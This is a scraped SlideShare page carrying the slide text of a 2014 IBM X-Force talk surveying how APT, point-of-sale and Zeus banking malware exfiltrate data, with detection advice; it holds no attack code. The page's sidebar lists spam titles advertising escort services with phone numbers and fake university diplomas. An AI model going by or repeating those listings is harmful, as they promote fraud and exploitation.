Soumettre la recherche
Mettre en ligne
Exfiltration slides-v1-release
•
Télécharger en tant que PPTX, PDF
•
0 j'aime
•
647 vues
Eric Koeppen
Suivre
Exfiltration slides from Virus Bulletin 2014.
Lire moins
Lire la suite
Internet
Affichage du diaporama
Signaler
Partager
Affichage du diaporama
Signaler
Partager
1 sur 19
Télécharger maintenant
Recommandé
Unit 3
Unit 3
abhishek srivastav
truMe for visitor management
truMe for visitor management
AthulJojo1
truMe for visitor access management
truMe for visitor access management
AthulJojo1
Visitor management system for government buildings
Visitor management system for government buildings
AthulJojo1
Introduction to ceh
Introduction to ceh
Hemant Mittal
Ch8ed12romney
Ch8ed12romney
woyaoni
Cybersecurity: More than A DoD Issue
Cybersecurity: More than A DoD Issue
Robert E Jones
Essential Layers of IBM i Security: System-Access Security
Essential Layers of IBM i Security: System-Access Security
Precisely
Recommandé
Unit 3
Unit 3
abhishek srivastav
truMe for visitor management
truMe for visitor management
AthulJojo1
truMe for visitor access management
truMe for visitor access management
AthulJojo1
Visitor management system for government buildings
Visitor management system for government buildings
AthulJojo1
Introduction to ceh
Introduction to ceh
Hemant Mittal
Ch8ed12romney
Ch8ed12romney
woyaoni
Cybersecurity: More than A DoD Issue
Cybersecurity: More than A DoD Issue
Robert E Jones
Essential Layers of IBM i Security: System-Access Security
Essential Layers of IBM i Security: System-Access Security
Precisely
Resume
Resume
Timothy Poss
Network Security
Network Security
Jitin Kollamkudy
AlertBoot Datasheet
AlertBoot Datasheet
tmaliyil
Enterprise Security in Mainframe-Connected Environments
Enterprise Security in Mainframe-Connected Environments
Precisely
Rune - Empowering User-based Security
Rune - Empowering User-based Security
Rob Levey
Network security
Network security
hajra azam
Firewall
Firewall
Nikhil Dagale
Building a Hacker Resistant Network
Building a Hacker Resistant Network
Sentry Global Technologies, LLC
Proprietary Information
Proprietary Information
hypknight
How to Hack a Telecom and Stay Alive
How to Hack a Telecom and Stay Alive
Positive Hack Days
CNIT 123: Ch 3: Network and Computer Attacks
CNIT 123: Ch 3: Network and Computer Attacks
Sam Bowne
Homework0703
Homework0703
YUEPINGTSAI
Development of security architecture
Development of security architecture
Imran Khan
Resume | Vijay Navgire
Resume | Vijay Navgire
Vijay Νavgire
Digital skimming root_conf_ppt
Digital skimming root_conf_ppt
Arjun BM
Credit card frauds in hospitality
Credit card frauds in hospitality
Vishal Sharma
640-554 IT Certification and Career Paths
640-554 IT Certification and Career Paths
hibaehed
IACP 2011
IACP 2011
gnichols_interdev
CNIT 123: Ch 4: Footprinting and Social Engineering
CNIT 123: Ch 4: Footprinting and Social Engineering
Sam Bowne
Essential Layers of IBM i Security Series – Network Security
Essential Layers of IBM i Security Series – Network Security
Precisely
Using Web Data Provenance for Quality Assessment
Using Web Data Provenance for Quality Assessment
Olaf Hartig
In Plain Sight: The Perfect Exfiltration
In Plain Sight: The Perfect Exfiltration
Itzik Kotler
Contenu connexe
Tendances
Resume
Resume
Timothy Poss
Network Security
Network Security
Jitin Kollamkudy
AlertBoot Datasheet
AlertBoot Datasheet
tmaliyil
Enterprise Security in Mainframe-Connected Environments
Enterprise Security in Mainframe-Connected Environments
Precisely
Rune - Empowering User-based Security
Rune - Empowering User-based Security
Rob Levey
Network security
Network security
hajra azam
Firewall
Firewall
Nikhil Dagale
Building a Hacker Resistant Network
Building a Hacker Resistant Network
Sentry Global Technologies, LLC
Proprietary Information
Proprietary Information
hypknight
How to Hack a Telecom and Stay Alive
How to Hack a Telecom and Stay Alive
Positive Hack Days
CNIT 123: Ch 3: Network and Computer Attacks
CNIT 123: Ch 3: Network and Computer Attacks
Sam Bowne
Homework0703
Homework0703
YUEPINGTSAI
Development of security architecture
Development of security architecture
Imran Khan
Resume | Vijay Navgire
Resume | Vijay Navgire
Vijay Νavgire
Digital skimming root_conf_ppt
Digital skimming root_conf_ppt
Arjun BM
Credit card frauds in hospitality
Credit card frauds in hospitality
Vishal Sharma
640-554 IT Certification and Career Paths
640-554 IT Certification and Career Paths
hibaehed
IACP 2011
IACP 2011
gnichols_interdev
CNIT 123: Ch 4: Footprinting and Social Engineering
CNIT 123: Ch 4: Footprinting and Social Engineering
Sam Bowne
Essential Layers of IBM i Security Series – Network Security
Essential Layers of IBM i Security Series – Network Security
Precisely
Tendances
(20)
Resume
Resume
Network Security
Network Security
AlertBoot Datasheet
AlertBoot Datasheet
Enterprise Security in Mainframe-Connected Environments
Enterprise Security in Mainframe-Connected Environments
Rune - Empowering User-based Security
Rune - Empowering User-based Security
Network security
Network security
Firewall
Firewall
Building a Hacker Resistant Network
Building a Hacker Resistant Network
Proprietary Information
Proprietary Information
How to Hack a Telecom and Stay Alive
How to Hack a Telecom and Stay Alive
CNIT 123: Ch 3: Network and Computer Attacks
CNIT 123: Ch 3: Network and Computer Attacks
Homework0703
Homework0703
Development of security architecture
Development of security architecture
Resume | Vijay Navgire
Resume | Vijay Navgire
Digital skimming root_conf_ppt
Digital skimming root_conf_ppt
Credit card frauds in hospitality
Credit card frauds in hospitality
640-554 IT Certification and Career Paths
640-554 IT Certification and Career Paths
IACP 2011
IACP 2011
CNIT 123: Ch 4: Footprinting and Social Engineering
CNIT 123: Ch 4: Footprinting and Social Engineering
Essential Layers of IBM i Security Series – Network Security
Essential Layers of IBM i Security Series – Network Security
En vedette
Using Web Data Provenance for Quality Assessment
Using Web Data Provenance for Quality Assessment
Olaf Hartig
In Plain Sight: The Perfect Exfiltration
In Plain Sight: The Perfect Exfiltration
Itzik Kotler
Data leakage detection (synopsis)
Data leakage detection (synopsis)
Mumbai Academisc
Data leakage detection
Data leakage detection
kalpesh1908
Data exfiltration so many threats 2016
Data exfiltration so many threats 2016
FitCEO, Inc. (FCI)
data-leakage-detection
data-leakage-detection
Nagendra Kumar
Data leakage detection
Data leakage detection
Mohit Pandey
Data leakage detection
Data leakage detection
rejii
Data leakage detection
Data leakage detection
Vikrant Arya
Advanced Data Exfiltration
Advanced Data Exfiltration
Iftach Ian Amit
Data leakage detection Complete Seminar
Data leakage detection Complete Seminar
Sumit Thakur
En vedette
(11)
Using Web Data Provenance for Quality Assessment
Using Web Data Provenance for Quality Assessment
In Plain Sight: The Perfect Exfiltration
In Plain Sight: The Perfect Exfiltration
Data leakage detection (synopsis)
Data leakage detection (synopsis)
Data leakage detection
Data leakage detection
Data exfiltration so many threats 2016
Data exfiltration so many threats 2016
data-leakage-detection
data-leakage-detection
Data leakage detection
Data leakage detection
Data leakage detection
Data leakage detection
Data leakage detection
Data leakage detection
Advanced Data Exfiltration
Advanced Data Exfiltration
Data leakage detection Complete Seminar
Data leakage detection Complete Seminar
Similaire à Exfiltration slides-v1-release
Anatomy of an Advanced Retail Breach
Anatomy of an Advanced Retail Breach
IBM Security
Using Massively Distributed Malware in APT-Style Attacks
Using Massively Distributed Malware in APT-Style Attacks
IBM Security
The Threat Landscape & Network Security Measures
The Threat Landscape & Network Security Measures
Carl B. Forkner, Ph.D.
Combating Constantly Evolving Advanced Threats – Solution Architecture
Combating Constantly Evolving Advanced Threats – Solution Architecture
IBM Sverige
Don’t Sweat the Small Stuff – Protect What Matters Most - Interop 2014
Don’t Sweat the Small Stuff – Protect What Matters Most - Interop 2014
Unisys Corporation
Cyber security
Cyber security
vishakha bhagwat
Ethical hacking (legal)
Ethical hacking (legal)
Thangaraj Murugananthan
Ethical hacking
Ethical hacking
Ravi Rajput
Combat the Latest Two-Factor Authentication Evasion Techniques
Combat the Latest Two-Factor Authentication Evasion Techniques
IBM Security
Shah Sheikh / ISACA UAE - Deep Dive on Evasive Malware
Shah Sheikh / ISACA UAE - Deep Dive on Evasive Malware
Shah Sheikh
Discover advanced threats with threat intelligence - Jeremy Li
Discover advanced threats with threat intelligence - Jeremy Li
Jeremy Li
Defending Your IBM i Against Malware
Defending Your IBM i Against Malware
Precisely
PoS Malware and Other Threats to the Retail Industry
PoS Malware and Other Threats to the Retail Industry
Invincea, Inc.
Leave ATM Forever Alone
Leave ATM Forever Alone
Olga Kochetova
Trends in electronic crimes and its impact on businesses like yours
Trends in electronic crimes and its impact on businesses like yours
MotherGuardians
Cyber Tech Israel 2016: Advanced Threat Protection Technical Overview
Cyber Tech Israel 2016: Advanced Threat Protection Technical Overview
Symantec
Failed Ransom: How IBM XGS Defeated Ransomware
Failed Ransom: How IBM XGS Defeated Ransomware
IBM Security
Hacking by Pratyush Gupta
Hacking by Pratyush Gupta
Tenet Systems Pvt Ltd
Ethical Hacking: Safeguarding Systems through Responsible Security Testing
Ethical Hacking: Safeguarding Systems through Responsible Security Testing
champubhaiya8
ICS Network Security Monitoring (NSM)
ICS Network Security Monitoring (NSM)
Digital Bond
Similaire à Exfiltration slides-v1-release
(20)
Anatomy of an Advanced Retail Breach
Anatomy of an Advanced Retail Breach
Using Massively Distributed Malware in APT-Style Attacks
Using Massively Distributed Malware in APT-Style Attacks
The Threat Landscape & Network Security Measures
The Threat Landscape & Network Security Measures
Combating Constantly Evolving Advanced Threats – Solution Architecture
Combating Constantly Evolving Advanced Threats – Solution Architecture
Don’t Sweat the Small Stuff – Protect What Matters Most - Interop 2014
Don’t Sweat the Small Stuff – Protect What Matters Most - Interop 2014
Cyber security
Cyber security
Ethical hacking (legal)
Ethical hacking (legal)
Ethical hacking
Ethical hacking
Combat the Latest Two-Factor Authentication Evasion Techniques
Combat the Latest Two-Factor Authentication Evasion Techniques
Shah Sheikh / ISACA UAE - Deep Dive on Evasive Malware
Shah Sheikh / ISACA UAE - Deep Dive on Evasive Malware
Discover advanced threats with threat intelligence - Jeremy Li
Discover advanced threats with threat intelligence - Jeremy Li
Defending Your IBM i Against Malware
Defending Your IBM i Against Malware
PoS Malware and Other Threats to the Retail Industry
PoS Malware and Other Threats to the Retail Industry
Leave ATM Forever Alone
Leave ATM Forever Alone
Trends in electronic crimes and its impact on businesses like yours
Trends in electronic crimes and its impact on businesses like yours
Cyber Tech Israel 2016: Advanced Threat Protection Technical Overview
Cyber Tech Israel 2016: Advanced Threat Protection Technical Overview
Failed Ransom: How IBM XGS Defeated Ransomware
Failed Ransom: How IBM XGS Defeated Ransomware
Hacking by Pratyush Gupta
Hacking by Pratyush Gupta
Ethical Hacking: Safeguarding Systems through Responsible Security Testing
Ethical Hacking: Safeguarding Systems through Responsible Security Testing
ICS Network Security Monitoring (NSM)
ICS Network Security Monitoring (NSM)
Dernier
Film cover research (1).pptxsdasdasdasdasdasa
Film cover research (1).pptxsdasdasdasdasdasa
494f574xmv
Contact Rya Baby for Call Girls New Delhi
Contact Rya Baby for Call Girls New Delhi
miss dipika
定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一
定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一
Fs
Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)
Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)
Dana Luther
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一
Fs
Elevate Your Business with Our IT Expertise in New Orleans
Elevate Your Business with Our IT Expertise in New Orleans
corenetworkseo
Font Performance - NYC WebPerf Meetup April '24
Font Performance - NYC WebPerf Meetup April '24
Paul Calvano
办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书
办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书
zdzoqco
Blepharitis inflammation of eyelid symptoms cause everything included along w...
Blepharitis inflammation of eyelid symptoms cause everything included along w...
Excelmac1
SCM Symposium PPT Format Customer loyalty is predi
SCM Symposium PPT Format Customer loyalty is predi
eusebiomeyer
定制(Management毕业证书)新加坡管理大学毕业证成绩单原版一比一
定制(Management毕业证书)新加坡管理大学毕业证成绩单原版一比一
Fs
办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一
办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一
z xss
Call Girls South Delhi Delhi reach out to us at ☎ 9711199012
Call Girls South Delhi Delhi reach out to us at ☎ 9711199012
rehmti665
young call girls in Uttam Nagar🔝 9953056974 🔝 Delhi escort Service
young call girls in Uttam Nagar🔝 9953056974 🔝 Delhi escort Service
9953056974 Low Rate Call Girls In Saket, Delhi NCR
A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)
A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)
Christopher H Felton
『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书
『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书
rnrncn29
Magic exist by Marta Loveguard - presentation.pptx
Magic exist by Marta Loveguard - presentation.pptx
MartaLoveguard
Call Girls Near The Suryaa Hotel New Delhi 9873777170
Call Girls Near The Suryaa Hotel New Delhi 9873777170
Sonam Pathan
Model Call Girl in Jamuna Vihar Delhi reach out to us at 🔝9953056974🔝
Model Call Girl in Jamuna Vihar Delhi reach out to us at 🔝9953056974🔝
9953056974 Low Rate Call Girls In Saket, Delhi NCR
Hot Sexy call girls in Rk Puram 🔝 9953056974 🔝 Delhi escort Service
Hot Sexy call girls in Rk Puram 🔝 9953056974 🔝 Delhi escort Service
9953056974 Low Rate Call Girls In Saket, Delhi NCR
Dernier
(20)
Film cover research (1).pptxsdasdasdasdasdasa
Film cover research (1).pptxsdasdasdasdasdasa
Contact Rya Baby for Call Girls New Delhi
Contact Rya Baby for Call Girls New Delhi
定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一
定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一
Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)
Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一
Elevate Your Business with Our IT Expertise in New Orleans
Elevate Your Business with Our IT Expertise in New Orleans
Font Performance - NYC WebPerf Meetup April '24
Font Performance - NYC WebPerf Meetup April '24
办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书
办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书
Blepharitis inflammation of eyelid symptoms cause everything included along w...
Blepharitis inflammation of eyelid symptoms cause everything included along w...
SCM Symposium PPT Format Customer loyalty is predi
SCM Symposium PPT Format Customer loyalty is predi
定制(Management毕业证书)新加坡管理大学毕业证成绩单原版一比一
定制(Management毕业证书)新加坡管理大学毕业证成绩单原版一比一
办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一
办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一
Call Girls South Delhi Delhi reach out to us at ☎ 9711199012
Call Girls South Delhi Delhi reach out to us at ☎ 9711199012
young call girls in Uttam Nagar🔝 9953056974 🔝 Delhi escort Service
young call girls in Uttam Nagar🔝 9953056974 🔝 Delhi escort Service
A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)
A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)
『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书
『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书
Magic exist by Marta Loveguard - presentation.pptx
Magic exist by Marta Loveguard - presentation.pptx
Call Girls Near The Suryaa Hotel New Delhi 9873777170
Call Girls Near The Suryaa Hotel New Delhi 9873777170
Model Call Girl in Jamuna Vihar Delhi reach out to us at 🔝9953056974🔝
Model Call Girl in Jamuna Vihar Delhi reach out to us at 🔝9953056974🔝
Hot Sexy call girls in Rk Puram 🔝 9953056974 🔝 Delhi escort Service
Hot Sexy call girls in Rk Puram 🔝 9953056974 🔝 Delhi escort Service
Exfiltration slides-v1-release
1.
HOW THEY’RE GETTING
THE DATA OUT OF YOUR NETWORK Eric Koeppen IBM X-Force Advanced Research erkoeppe[at]us[dot]ibm[dot]com @PorkChop (v1) IBM Security Systems | © 2014 IBM Corporation
2.
IBM Security Systems
| © 2014 IBM Corporation AGENDA Introduction Exfiltration Scenarios – Advanced Persistent Threat (APT) – Point of Sale (POS) Malware – Financial Malware Conclusion
3.
HOW THEY’RE GETTING
THE DATA OUT OF YOUR NETWORK: A SURVEY OF METHODS USED FOR EXFILTRATION OF SENSITIVE DATA, RECOMMENDATIONS FOR DETECTION AND PROTECTION IBM Security Systems | © 2014 IBM Corporation INTRODUCTION
4.
IBM Security Systems
| © 2014 IBM Corporation INTRODUCTION Initial malware infection often just the first step. Data sent to external servers. Can have disastrous effects: – Initial loss of revenue – Company brand image – Customer loyalty – Competitive advantage (trade secrets) – Subsequent lawsuits
5.
HOW THEY’RE GETTING
THE DATA OUT OF YOUR NETWORK: A SURVEY OF METHODS USED FOR EXFILTRATION OF SENSITIVE DATA, RECOMMENDATIONS FOR DETECTION AND PROTECTION IBM Security Systems | © 2014 IBM Corporation EXFILTRATION SCENARIOS
6.
Operation ShadyRAT
– Began 2006 and ran for 5 years – Targeted over 70 organizations – Government organizations & private companies – Multiple infection mechanisms – Moves laterally through network – Novel C2 (often used steganography) – Petabytes of data IBM Security Systems | © 2014 IBM Corporation ADVANCED PERSISTENT THREAT
7.
IBM Security Systems
| © 2014 IBM Corporation ADVANCED PERSISTENT THREAT
8.
IBM Security Systems
| © 2014 IBM Corporation ADVANCED PERSISTENT THREAT Detection APT Exfiltration tactics – Data different for each site • Data types different • Data formats different – Various forms of C2 – Initial connection uses predefined handshake
9.
IBM Security Systems
| © 2014 IBM Corporation POINT OF SALE MALWARE BlackPOS – the Target attack – Customer data compromised • 40 million accounts • PII data for 70 million – Initial infection by Trojan – Periodic memory scraping to collect info
10.
IBM Security Systems
| © 2014 IBM Corporation POINT OF SALE MALWARE (SCENARIO 1)
11.
IBM Security Systems
| © 2014 IBM Corporation POINT OF SALE MALWARE (SCENARIO 2)
12.
Detection POS
Malware Exfiltration – Leverages different transport protocols/methods • HTTP Posts, HTTP Gets, HTTPS, FTP, SMB/NetBIOS, NFS, etc – Data usually known format: • Track 1 & 2 credit card information – Various data encoding techniques: • Some samples use Ascii or UUencoding • Some samples use minor obfuscation • Some samples use encryption IBM Security Systems | © 2014 IBM Corporation POINT OF SALE MALWARE
13.
Zeus Banking
Trojan – Many variants – Has been around for years – Gameover Zeus variant has accounted for over $100 million in theft since 2011 – Various techniques: • Mock up web pages for stealing bank info • Parsing cookie files for local data-containing files • Steal digital certificates, local private keys • Stealing FTP client info and mail client settings • Parses registry keys for valuable information IBM Security Systems | © 2014 IBM Corporation FINANCIALMALWARE
14.
IBM Security Systems
| © 2014 IBM Corporation FINANCIALMALWARE (SCENARIO 1)
15.
IBM Security Systems
| © 2014 IBM Corporation FINANCIALMALWARE (SCENARIO 2)
16.
Detection Zeus
Banking Trojan Exfiltration – Constantly updating their techniques – Payload messages hashed, signed, and encrypted with RC4 encryption – Can detect the presence of P2P botnet on the network (Game Over P2P variant) • Detect P2P keep-alive messages IBM Security Systems | © 2014 IBM Corporation FINANCIALMALWARE
17.
HOW THEY’RE GETTING
THE DATA OUT OF YOUR NETWORK: A SURVEY OF METHODS USED FOR EXFILTRATION OF SENSITIVE DATA, RECOMMENDATIONS FOR DETECTION AND PROTECTION IBM Security Systems | © 2014 IBM Corporation CONCLUSION
18.
IBM Security Systems
| © 2014 IBM Corporation CONCLUSION – Changing landscape – Detection based on knowing: • Which data is being targeted • What are typical formats for that data • How that data is being encoded – When data is encrypted, monitor traffic patterns – Common practices can go a long way: • Monitor logs • Keep patches up to date • Lock down acceptable communication • Educate users
19.
HOW THEY’RE GETTING
THE DATA OUT OF YOUR NETWORK IBM Security Systems | © 2014 IBM Corporation Thank You! Eric Koeppen IBM X-Force Advanced Research erkoeppe[at]us[dot]ibm[dot]com @PorkChop
Télécharger maintenant